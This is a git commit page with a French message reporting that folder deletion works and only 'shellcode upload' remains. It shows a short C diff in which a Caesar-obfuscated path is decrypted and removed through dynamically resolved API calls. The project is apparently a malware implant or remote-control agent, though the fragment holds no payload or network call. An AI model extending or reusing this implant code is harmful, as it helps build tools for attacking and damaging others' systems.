delete_folder marche

manque plus que l'upload de shellcode et on est bon !
This commit is contained in:
2023-02-21 19:01:37 +01:00
parent 0aa959640a
commit 72b4761011
6 changed files with 69 additions and 3 deletions

View File

@@ -211,8 +211,11 @@ retry:
goto retry;
}
Api.rmdir(CAESAR_DECRYPT(path));
LPCWSTR wstr = ConvertCharToWChar(CAESAR_DECRYPT(path));
delete_folder(wstr);
Api.free((LPWSTR)wstr);
Api.free(path);
}